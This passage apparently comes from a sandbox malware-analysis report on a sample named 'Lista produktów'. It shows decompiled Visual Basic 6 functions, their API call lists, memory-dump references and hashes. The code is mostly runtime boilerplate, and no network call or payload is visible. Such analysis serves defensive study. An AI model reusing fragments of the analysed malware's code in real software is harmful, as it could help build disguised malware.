                  					_v76 = _v76 & 0x00000000;
                  				} else {
                  					_push(0x14);
                  					_push(0x402ff4);
                  					_push(_v48);
                  					_push(_v52);
                  					L00401394();
                  					_v76 = _t70;
                  				}
                  				_v56 = _v40;
                  				_t75 =  *((intOrPtr*)( *_v56 + 0xe8))(_v56,  &_v36);
                  				asm("fclex");
                  				_v60 = _t75;
                  				if(_v60 >= 0) {
                  					_v80 = _v80 & 0x00000000;
                  				} else {
                  					_push(0xe8);
                  					_push(0x403014);
                  					_push(_v56);
                  					_push(_v60);
                  					L00401394();
                  					_v80 = _t75;
                  				}
                  				_v68 = _v36;
                  				_v36 = _v36 & 0x00000000;
                  				L004013B2();
                  				L00401382();
                  				if( *0x412010 != 0) {
                  					_v84 = 0x412010;
                  				} else {
                  					_push("(RO");
                  					_push(0x40246c);
                  					L00401388();
                  					_v84 = 0x412010;
                  				}
                  				_t80 =  &_v40;
                  				L00401358();
                  				_v48 = _t80;
                  				_t84 =  *((intOrPtr*)( *_v48 + 0xf8))(_v48,  &_v44, _t80,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x300))( *_v84));
                  				asm("fclex");
                  				_v52 = _t84;
                  				if(_v52 >= 0) {
                  					_v88 = _v88 & 0x00000000;
                  				} else {
                  					_push(0xf8);
                  					_push(0x4030ec);
                  					_push(_v48);
                  					_push(_v52);
                  					L00401394();
                  					_v88 = _t84;
                  				}
                  				_t85 = _v44;
                  				_v24 = _t85;
                  				L00401382();
                  				_push(0x410dec);
                  				L00401364();
                  				L00401364();
                  				return _t85;
                  			}



























                  0x00410c3a
                  0x00410c45
                  0x00410c46
                  0x00410c4d
                  0x00410c50
                  0x00410c58
                  0x00410c5b
                  0x00410c68
                  0x00410c74
                  0x00410c8e
                  0x00410c76
                  0x00410c76
                  0x00410c7b
                  0x00410c80
                  0x00410c85
                  0x00410c85
                  0x00410c9a
                  0x00410ca9
                  0x00410cac
                  0x00410cae
                  0x00410cb5
                  0x00410cce
                  0x00410cb7
                  0x00410cb7
                  0x00410cb9
                  0x00410cbe
                  0x00410cc1
                  0x00410cc4
                  0x00410cc9
                  0x00410cc9
                  0x00410cd5
                  0x00410ce4
                  0x00410cea
                  0x00410cec
                  0x00410cf3
                  0x00410d0f
                  0x00410cf5
                  0x00410cf5
                  0x00410cfa
                  0x00410cff
                  0x00410d02
                  0x00410d05
                  0x00410d0a
                  0x00410d0a
                  0x00410d16
                  0x00410d19
                  0x00410d23
                  0x00410d2b
                  0x00410d37
                  0x00410d51
                  0x00410d39
                  0x00410d39
                  0x00410d3e
                  0x00410d43
                  0x00410d48
                  0x00410d48
                  0x00410d6c
                  0x00410d70
                  0x00410d75
                  0x00410d84
                  0x00410d8a
                  0x00410d8c
                  0x00410d93
                  0x00410daf
                  0x00410d95
                  0x00410d95
                  0x00410d9a
                  0x00410d9f
                  0x00410da2
                  0x00410da5
                  0x00410daa
                  0x00410daa
                  0x00410db3
                  0x00410db7
                  0x00410dbe
                  0x00410dc3
                  0x00410dde
                  0x00410de6
                  0x00410deb

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410C50
                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 00410C68
                  • __vbaNew2.MSVBVM60(00403004,004123C0,?,?,?,?,004011F6), ref: 00410C80
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402FF4,00000014), ref: 00410CC4
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403014,000000E8), ref: 00410D05
                  • __vbaStrMove.MSVBVM60 ref: 00410D23
                  • __vbaFreeObj.MSVBVM60 ref: 00410D2B
                  • __vbaNew2.MSVBVM60(0040246C,(RO), ref: 00410D43
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410D70
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,004030EC,000000F8), ref: 00410DA5
                  • __vbaFreeObj.MSVBVM60 ref: 00410DBE
                  • __vbaFreeStr.MSVBVM60(00410DEC), ref: 00410DDE
                  • __vbaFreeStr.MSVBVM60(00410DEC), ref: 00410DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$CheckHresult$New2$ChkstkCopyMove
                  • String ID: (RO
                  • API String ID: 4110455518-2817633693
                  • Opcode ID: 95300b48452b51f770d4c72b014544a06553ac77becf2c4403ea04b40c536b04
                  • Instruction ID: 024535f1ee5fae5b6a6260df13b9132df2a30069dd4cf38f6b1a84f4d7f0ceca
                  • Opcode Fuzzy Hash: 95300b48452b51f770d4c72b014544a06553ac77becf2c4403ea04b40c536b04
                  • Instruction Fuzzy Hash: 0051E070900208EFDB00DFE5D985BDDBBB5BF08304F20812AE901B72A1D7B96995DB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 46%
                  			E00410EBC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				char _v40;
                  				char _v56;
                  				char _v72;
                  				char _v88;
                  				void* _v104;
                  				char _v120;
                  				char _v124;
                  				intOrPtr _v132;
                  				char _v140;
                  				intOrPtr _v148;
                  				char _v156;
                  				short _v164;
                  				char _v172;
                  				char _v188;
                  				char _v204;
                  				signed int _v212;
                  				char _v220;
                  				intOrPtr _v228;
                  				char _v236;
                  				char _v252;
                  				char _v268;
                  				char _v284;
                  				intOrPtr _v296;
                  				char* _t83;
                  				char* _t86;
                  				char* _t90;
                  				char* _t94;
                  				char* _t97;
                  				char* _t99;
                  				short _t103;
                  				char* _t115;
                  				char* _t119;
                  				void* _t140;
                  				void* _t142;
                  				intOrPtr _t143;
                  
                  				_t143 = _t142 - 0xc;
                  				 *[fs:0x0] = _t143;
                  				L004011F0();
                  				_v16 = _t143;
                  				_v12 = 0x4011e0;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t140);
                  				L004012BC();
                  				_push( &_v252);
                  				_t83 =  &_v72;
                  				_push(_t83);
                  				L004012B6();
                  				if(_t83 == 0) {
                  					_push( &_v252);
                  					_t86 =  &_v88;
                  					_push(_t86);
                  					L004012B6();
                  					if(_t86 != 0) {
                  						_v212 = _v212 | 0xffffffff;
                  						_v220 = 2;
                  						_v228 = 1;
                  						_v236 = 2;
                  						_push( &_v220);
                  						_push( &_v236);
                  						_push( &_v120);
                  						_t94 =  &_v140;
                  						_push(_t94);
                  						L004012AA();
                  						_push(_t94);
                  						_push( &_v284);
                  						_push( &_v268);
                  						_t97 =  &_v40;
                  						_push(_t97);
                  						L004012B0();
                  						_v296 = _t97;
                  						while(_v296 != 0) {
                  							_v132 = 1;
                  							_v140 = 2;
                  							_push( &_v140);
                  							_t99 =  &_v40;
                  							_push(_t99);
                  							L00401346();
                  							_push(_t99);
                  							_push( &_v120);
                  							_push( &_v156);
                  							L00401292();
                  							_push( &_v156);
                  							_t103 =  &_v124;
                  							_push(_t103);
                  							L00401298();
                  							_push(_t103);
                  							L0040129E();
                  							_v164 = _t103;
                  							_v172 = 2;
                  							_push( &_v172);
                  							_push( &_v188);
                  							L004012A4();
                  							_push( &_v56);
                  							_push( &_v188);
                  							_push( &_v204);
                  							L0040133A();
                  							L00401340();
                  							L00401364();
                  							_push( &_v188);
                  							_push( &_v172);
                  							_push( &_v156);
                  							_push( &_v140);
                  							_push(4);
                  							L004013B8();
                  							_t143 = _t143 + 0x14;
                  							_push( &_v284);
                  							_push( &_v268);
                  							_t115 =  &_v40;
                  							_push(_t115);
                  							L0040128C();
                  							_v296 = _t115;
                  						}
                  						_v148 = 0x80020004;
                  						_v156 = 0xa;
                  						_v212 = 0x403228;
                  						_v220 = 8;
                  						_push(1);
                  						_push(1);
                  						_push( &_v156);
                  						_push( &_v220);
                  						_push( &_v56);
                  						_t119 =  &_v140;
                  						_push(_t119);
                  						L0040133A();
                  						_push(_t119);
                  						L00401286();
                  						_v164 = _t119;
                  						_v172 = 8;
                  						L00401340();
                  						_push( &_v156);
                  						_push( &_v140);
                  						_push(2);
                  						L004013B8();
                  						_t143 = _t143 + 0xc;
                  					}
                  				} else {
                  					L004012BC();
                  				}
                  				_push(0x4111ac);
                  				_push( &_v284);
                  				_push( &_v268);
                  				_t90 =  &_v252;
                  				_push(_t90);
                  				_push(3);
                  				L004013B8();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				L004013A6();
                  				return _t90;
                  			}









































                  0x00410ebf
                  0x00410ece
                  0x00410eda
                  0x00410ee2
                  0x00410ee5
                  0x00410eec
                  0x00410efb
                  0x00410f07
                  0x00410f12
                  0x00410f13
                  0x00410f16
                  0x00410f17
                  0x00410f21
                  0x00410f39
                  0x00410f3a
                  0x00410f3d
                  0x00410f3e
                  0x00410f48
                  0x00410f4e
                  0x00410f55
                  0x00410f5f
                  0x00410f69
                  0x00410f79
                  0x00410f80
                  0x00410f84
                  0x00410f85
                  0x00410f8b
                  0x00410f8c
                  0x00410f91
                  0x00410f98
                  0x00410f9f
                  0x00410fa0
                  0x00410fa3
                  0x00410fa4
                  0x00410fa9
                  0x0041108c
                  0x00410fb4
                  0x00410fbb
                  0x00410fcb
                  0x00410fcc
                  0x00410fcf
                  0x00410fd0
                  0x00410fd5
                  0x00410fd9
                  0x00410fe0
                  0x00410fe1
                  0x00410fec
                  0x00410fed
                  0x00410ff0
                  0x00410ff1
                  0x00410ff6
                  0x00410ff7
                  0x00410ffc
                  0x00411003
                  0x00411013
                  0x0041101a
                  0x0041101b
                  0x00411023
                  0x0041102a
                  0x00411031
                  0x00411032
                  0x0041103c
                  0x00411044
                  0x0041104f
                  0x00411056
                  0x0041105d
                  0x00411064
                  0x00411065
                  0x00411067
                  0x0041106c
                  0x00411075
                  0x0041107c
                  0x0041107d
                  0x00411080
                  0x00411081
                  0x00411086
                  0x00411086
                  0x00411099
                  0x004110a3
                  0x004110ad
                  0x004110b7
                  0x004110c1
                  0x004110c3
                  0x004110cb
                  0x004110d2
                  0x004110d6
                  0x004110d7
                  0x004110dd
                  0x004110de
                  0x004110e3
                  0x004110e4
                  0x004110e9
                  0x004110ef
                  0x00411102
                  0x0041110d
                  0x00411114
                  0x00411115
                  0x00411117
                  0x0041111c
                  0x0041111c
                  0x00410f23
                  0x00410f29
                  0x00410f29
                  0x0041111f
                  0x00411162
                  0x00411169
                  0x0041116a
                  0x00411170
                  0x00411171
                  0x00411173
                  0x0041117e
                  0x00411186
                  0x0041118e
                  0x00411196
                  0x0041119e
                  0x004111a6
                  0x004111ab

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410EDA
                  • __vbaVarCopy.MSVBVM60(?,?,?,?,004011F6), ref: 00410F07
                  • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,?,004011F6), ref: 00410F17
                  • __vbaVarCopy.MSVBVM60(?,?,?,?,?,?,004011F6), ref: 00410F29
                  • __vbaVarTstEq.MSVBVM60(?,?,?,?,?,?,?,?,004011F6), ref: 00410F3E
                  • __vbaLenVar.MSVBVM60(?,?,00000002,00000002), ref: 00410F8C
                  • __vbaVarForInit.MSVBVM60(?,?,?,00000000,?,?,00000002,00000002), ref: 00410FA4
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Copy$ChkstkInit
                  • String ID:
                  • API String ID: 3826034973-0
                  • Opcode ID: d3ced0dd5c703300f44cb424f73d22857c4db9a1b83eaae256af07889db05f3a
                  • Instruction ID: f89c889c320f9f68246e9bd7ef3dcdbd7556e1c525a84103f408a27ce6f7dab8
                  • Opcode Fuzzy Hash: d3ced0dd5c703300f44cb424f73d22857c4db9a1b83eaae256af07889db05f3a
                  • Instruction Fuzzy Hash: DD21017180055DABCB11DB95C985FDEB7BCAF08304F1085ABB209F7151EB789B898F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E00410E09(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				long long _v32;
                  				void* _v36;
                  				char _v44;
                  				char _v52;
                  				char* _t19;
                  				void* _t27;
                  				void* _t29;
                  				intOrPtr _t30;
                  
                  				_t30 = _t29 - 0xc;
                  				 *[fs:0x0] = _t30;
                  				L004011F0();
                  				_v16 = _t30;
                  				_v12 = 0x4011d0;
                  				_v8 = 0;
                  				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4011f6, _t27);
                  				_v44 = 2;
                  				_v52 = 2;
                  				_t19 =  &_v52;
                  				_push(_t19);
                  				L004013AC();
                  				L004013B2();
                  				L004013A6();
                  				_v32 =  *0x4011c8;
                  				asm("wait");
                  				_push(0x410e95);
                  				L00401364();
                  				return _t19;
                  			}














                  0x00410e0c
                  0x00410e1b
                  0x00410e25
                  0x00410e2d
                  0x00410e30
                  0x00410e37
                  0x00410e46
                  0x00410e49
                  0x00410e50
                  0x00410e57
                  0x00410e5a
                  0x00410e5b
                  0x00410e65
                  0x00410e6d
                  0x00410e78
                  0x00410e7b
                  0x00410e7c
                  0x00410e8f
                  0x00410e94

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004011F6), ref: 00410E25
                  • #536.MSVBVM60(00000002), ref: 00410E5B
                  • __vbaStrMove.MSVBVM60(00000002), ref: 00410E65
                  • __vbaFreeVar.MSVBVM60(00000002), ref: 00410E6D
                  • __vbaFreeStr.MSVBVM60(00410E95,00000002), ref: 00410E8F
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$Free$#536ChkstkMove
                  • String ID:
                  • API String ID: 2104488870-0
                  • Opcode ID: b700f43e101432fa6fa79f13be68e8778472f4484f8dc53e7c6aad7b04ac9813
                  • Instruction ID: 65fec2802833ff761578360ba7738edd19d08363b81867d35fb2e76992f97c1d
                  • Opcode Fuzzy Hash: b700f43e101432fa6fa79f13be68e8778472f4484f8dc53e7c6aad7b04ac9813
                  • Instruction Fuzzy Hash: 41014B71810208ABDB04EF96DC8AFDEBBB8BF08744F40842AF501BB5A1DBBC5544CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 19%
                  			E0041040F() {
                  				void* _t14;
                  				void* _t15;
                  
                  				_push(3);
                  				L0040131C();
                  				_push(_t15 - 0x354);
                  				_push(_t15 - 0x350);
                  				_push(_t15 - 0x34c);
                  				_push(3);
                  				L0040134C();
                  				_push(_t15 - 0x384);
                  				_push(_t15 - 0x374);
                  				_push(_t15 - 0x364);
                  				_push(3);
                  				L004013B8();
                  				_t14 = _t15 - 0x388;
                  				_push(_t14);
                  				_push(0);
                  				L004012DA();
                  				return _t14;
                  			}





                  0x0041040f
                  0x00410411
                  0x0041041f
                  0x00410426
                  0x0041042d
                  0x0041042e
                  0x00410430
                  0x0041043e
                  0x00410445
                  0x0041044c
                  0x0041044d
                  0x0041044f
                  0x00410457
                  0x0041045d
                  0x0041045e
                  0x00410460
                  0x00410465

                  APIs
                  • __vbaFreeStrList.MSVBVM60(00000003,00401C28), ref: 00410411
                  • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00410430
                  • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 0041044F
                  • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410460
                  Memory Dump Source
                  • Source File: 00000000.00000002.3167359802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.3167356802.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167365959.0000000000412000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.3167369437.0000000000414000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_Lista produkt#U00f3w.jbxd
                  Similarity
                  • API ID: __vba$FreeList$Destruct
                  • String ID:
                  • API String ID: 524854962-0
                  • Opcode ID: b58e2de8c947d5613cb7fb2b3b70ef42882ea12d68f185262f30ef51bebb3e5a
                  • Instruction ID: 25c989454ba01100b756f1bd32ce8504364835efd1bbf0d1260096a30a35e034
                  • Opcode Fuzzy Hash: b58e2de8c947d5613cb7fb2b3b70ef42882ea12d68f185262f30ef51bebb3e5a
                  • Instruction Fuzzy Hash: 97F0C9B28502186BFB52E691CD42FEA737CAB14704F8401EBBA0CE5091EA356B884B61
                  Uniqueness

                  Uniqueness Score: -1.00%